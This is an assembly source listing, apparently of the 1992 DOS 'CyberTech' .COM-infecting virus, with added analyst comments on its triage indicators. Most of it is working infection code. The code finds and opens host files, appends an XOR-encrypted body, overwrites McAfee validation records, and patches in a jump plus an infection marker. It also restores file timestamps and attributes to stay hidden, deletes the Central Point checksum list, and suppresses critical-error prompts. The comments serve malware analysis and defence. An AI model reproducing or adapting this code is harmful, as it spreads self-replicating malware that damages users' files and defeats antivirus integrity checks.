📄 cybertch.asm
Mov Ax,3d02h ; open file with read/write
Int 21h ; access
Mov Bx,5700h ; save file date/time stamp
Xchg Ax,Bx ; on the stack
Int 21h ;
Push Cx ;
Push Dx ;
Mov Ah,3fh ; read the first 4 bytes of
Lea Dx,OrgPrg[BP] ; the program onto OrgPrg
Mov Cx,4 ;
Int 21h ;
Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file
Cmp Ax,'ZM' ;
Je ExeFile ;
Cmp Ax,'MZ' ; Check if renamed weird exe-
Je ExeFile ; file
Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected
Cmp Ah,'*' ;
Jne Infect ;
ExeFile: Call Close ; If one of the checks is yes,
Mov Ah,4fh ; close file and search next
Jmp Search ; file
; FSeek -- shared helper for the whole-file seeks in this listing.
; In:  AX = 4200h (seek from start of file) or 4202h (seek from end of
;      file), as loaded by the callers. BX is not set here; presumably it
;      is the handle of the file opened earlier -- confirm against caller.
; Out: whatever INT 21h/AH=42h returns; the callers read the resulting
;      position from DX:AX.
; The offset CX:DX is forced to zero, so the pointer lands exactly on the
; first byte or on the end of the file.
FSeek: Xor Cx,Cx ; subroutine to jump to end
Xor Dx,Dx ; or begin of file
Int 21h ;
Ret ;
; Infect -- infection routine for one candidate .COM file.
; BX is not loaded in this block; presumably it is the handle of the file
; opened earlier -- confirm against the code above this block.
; DS:0FB00h is used as a scratch buffer throughout.
;
; What changes on disk (useful as triage indicators):
;   * the body (VirLen bytes) is written at EOF, or starting 52 or 10
;     bytes before EOF when a scanner validation record is recognised
;     there, in which case that record is destroyed;
;   * the first 4 bytes become E9h, a 16-bit displacement, and '*';
;   * the body is XOR-ed with one byte taken from the clock, so it differs
;     between infected files; only the DecrLen bytes copied from MainVir
;     are written unencrypted, with the key byte patched at Decrypt+2
;     (MainVir, Decrypt and DecrLen are defined outside this listing).
Infect: Mov Ax,4202h ; jump to EOF
Call FSeek ;
Cmp Ax,0f900 ; Check if file too large
Jae ExeFile ; if yes, goto exefile
Cmp Ax,10 ; Check if file too short
Jbe ExeFile ; if yes, goto exefile
; DX:AX is the file length returned by the seek. Read the last 52 bytes
; into DS:0FB00h; SI:DI remembers the file position EOF-52 for later.
Mov Cx,Dx ; calculate pointer to offset
Mov Dx,Ax ; EOF-52 (for McAfee validation
Sub Dx,52 ; codes)
Mov Si,Cx ; move file pointer to the
Mov Di,Dx ; calculated address
Mov Ax,4200h ;
Int 21h ;
Mov Ah,3fh ; read the last 52 bytes
Mov Dx,0fb00h ; of the file
Mov Cx,52 ;
Int 21h ;
; First layout: signature words 0FDF0h,0AAC5h at the start of the 52-byte
; tail, i.e. at file offset EOF-52.
Cmp Ds:0Fb00h,0fdf0h ; check if protected with the
Jne Check2 ; AG option
Cmp Ds:0fb02h,0aac5h ;
Jne Check2 ;
; Match: seek back to EOF-52 so the write below replaces the record
; instead of appending after it.
Mov Ax,4200h ; yes - let virus overwrite
Mov Cx,Si ; the code with itself, so
Mov Dx,Di ; the file has no validation
Int 21h ; code
Jmp CalcVirus ;
; Second layout: the same two signature words 42 bytes into the tail,
; i.e. at file offset EOF-10.
Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the
Jne Eof ; AV option
Cmp Ds:0Fb02h+42,0aac5h ;
Jne Eof ;
; Match: seek to EOF-52+42 = EOF-10 so the record is overwritten.
Mov Ax,4200h ; yes - let virus overwrite
Mov Cx,Si ; the code with itself, so
Mov Dx,Di ; the file has no validation
Add Dx,42 ; code
Int 21h ;
Jmp CalcVirus ;
Eof: Mov Ax,4202h ; not AG or AV - jump to
Call Fseek ; EOF
; AX = low word of the file position where the body will be written.
; Subtracting 3 (the size of the E9h jump placed at offset 0) gives the
; jump displacement, which is stored after the opcode byte of CallPtr.
CalcVirus: Sub Ax,3 ; calculate the jump for the
Mov Cs:CallPtr[BP]+1,Ax ; virus start
; Key selection: DL = hundredths-of-a-second field from DOS Get Time
; (AH=2Ch). A key of 0 would leave the body unchanged by the XOR below,
; so it is rejected; the banner in Msg is printed and the clock is read
; again.
GetCrypt: Mov Ah,2ch ; get 100s seconds for the
Int 21h ; encryption value.
Cmp Dl,0 ; if not zero, goto NoZero
Jne NoZero ;
Mov Ah,9 ; If zero, display copyright
Lea Dx,Msg[Bp] ; message and generate again
Int 21h ; a number
Jmp GetCrypt ;
; Build the on-disk image at 0FB00h: DecrLen bytes copied as-is from
; MainVir, followed by CryptLen bytes from Crypt, each XOR-ed with DL.
NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor
Lea Si,MainVir[BP] ; Move changed decryptor to
Mov Di,0fb00h ; a safe place in memory
Mov Cx,DecrLen ;
Rep Movsb ;
Lea Si,Crypt[BP] ; Encrypt the virus and merge
Mov Cx,CryptLen ; it to the changed decryptor
Encrypt: Lodsb ; code
Xor Al,Dl ;
Stosb ;
Loop Encrypt ;
; Write VirLen bytes from the buffer at the current file position (EOF,
; or the start of a recognised validation record).
Mov Ah,40h ; append virus at EOF or over
Lea Dx,0fb00h ; the validation code of
Mov Cx,VirLen ; McAfee
Int 21h ;
Mov Ax,4200h ; Jump to BOF
Call FSeek ;
; Four bytes are written from CallPtr, which is only three bytes long
; (E9h + displacement). The fourth byte is whatever follows it in memory:
; the '*' that starts FileSpec. That byte at file offset 3 is the marker
; the "already infected" check tests for.
Mov Ah,40h ; Write Jump at BOF
Lea Dx,CallPtr[BP] ;
Mov Cx,4 ;
Int 21h ;
Call Close ; Jump to Close routine
; Ready -- clean-up, then hand control to the host program.
; Steps, in order:
;   1. set the DTA back to offset 80h (AH=1Ah);
;   2. write the two words saved in OldInt24 back into the INT 24h slot of
;      the interrupt vector table at 0000:0090h (4*24h), undoing the
;      critical-error hook;
;   3. pop AX (pushed outside this listing; the original comment calls it
;      a possible error code);
;   4. far-return to CS:0100h, the entry point of a .COM image.
; DS is pointed at segment 0 only for the vector write and is reloaded
; from CS straight afterwards.
Ready: Mov Ah,1ah ; Restore DTA to normal
Mov Dx,80h ; offset
Int 21h ;
Mov Ax,Cs:OldInt24[Bp] ; remove critical error
Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the
Xor Bx,Bx ; original handler at the
Push Bx ; interrupt table
Pop Ds ; DS = 0000h (vector table)
Mov Ds:[4*24h],Dx ;
Mov Ds:[4*24h]+2,Ax ;
Push Cs ;
Pop Ds ; DS = CS again
Pop Ax ; restore possible error code
Mov Bx,100h ; nice way to jump to the
Push Cs ; begin of the original host
Push Bx ; code
Retf ; pops 0100h into IP, then CS
; Close -- put the file's metadata back, close it, and delete the
; checksum list.
; The routine is entered with Call, so its return address lies on top of
; the values the caller pushed earlier. SI holds the return address while
; those values are popped and is pushed back just before Ret.
; Popped here: DX and CX = date/time stamp saved after the file was
; opened; a third word used as the attribute value for AX=4301h
; (presumably pushed before the open, outside this listing -- confirm).
; DS:0FD1Eh is presumably the name of the file being processed -- confirm
; against the search code.
;
; Defender's note: because the time stamp and attributes are restored,
; neither is a reliable sign of modification. The deletion of chklist.cps
; in the current directory removes the Central Point checksum list, so a
; missing list is itself worth noticing.
Close: Pop Si ; set the return address aside
Pop Dx ; restore file date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; close file
Int 21h ;
Mov Ax,4301h ; restore file attributes
Pop Cx ;
Mov Dx,0fd1eh ;
Int 21h ;
Mov Ah,41h ; delete CHKLIST.CPS (the
Lea Dx,CpsName[BP] ; Central Point CRC list)
Int 21h ;
Push Si ; put the return address back
Ret
;
; Message when we are in 1993
;
; Removed has no '$' terminator of its own. It is immediately followed in
; memory by Msg, which ends in '$', so printing Removed with INT 21h/AH=09h
; shows both texts.
; Analyst note: CryptLen is measured up to the end of this data area, so
; these strings are likely stored XOR-ed in infected files and a plain
; text search on disk would not find them -- confirm against the position
; of the Crypt label, which is outside this listing.
Removed Db 13,10,'The previous year you have been infected by a virus'
Db 13,10,'without knowing or removing it. To be gentle to you'
Db 13,10,'I decided to remove myself from your system. I suggest'
Db 13,10,'you better buy ViruScan of McAfee to ensure yourself'
Db 13,10,'complete security of your precious data. Next time you'
Db 13,10,'could be infected with a malevolent virus.'
Db 13,10,10,'May I say goodbye to you for now....',13,10
;
; Message when encryption byte = 0 or when we are living in 1993
;
; Printed on its own when the clock-derived key is 0 (see GetCrypt).
Msg Db 13,10,'CyberTech Virus - Strain A'
Db 13,10,'(C) 1992 John Tardy of Trident'
Db 13,10,'$'
;
; New critical error handler
;
; NewInt24 -- replacement INT 24h (critical error) handler.
; Returns AL=3 at once, which tells DOS to fail the call that caused the
; error, so no critical-error prompt is shown while this handler is
; installed. The original vector is kept in OldInt24 and written back in
; Ready.
NewInt24: Mov Al,3 ; suppress any critical error
Iret ; messages
; Data area at the end of the body.
; Layout matters here: CallPtr (3 bytes) must be directly followed by
; FileSpec, because the 4-byte write at the start of an infected file
; takes its fourth byte from the '*' that begins FileSpec.
CpsName Db 'chklist.cps',0 ; name for CP CRC-list
OldInt24 Dd 0 ; storage place for old int 24
CallPtr Db 0e9h,0,0 ; E9h = near jump; displacement
                    ; filled in at CalcVirus
FileSpec Db '*.COM',0 ; filespec and infection marker
; OrgPrg is a 4-byte buffer: the first 4 bytes of the host file are read
; into it before infection. As assembled it holds Int 20h (2 bytes)
; followed by 'JT'.
OrgPrg: Int 20h ; original program
Db 'JT' ;
; Both lengths are measured from labels defined outside this listing.
CryptLen Equ $-Crypt ; encrypted part length
VirLen Equ $-MainVir ; total virus length
; ------------------------------------------------------------------------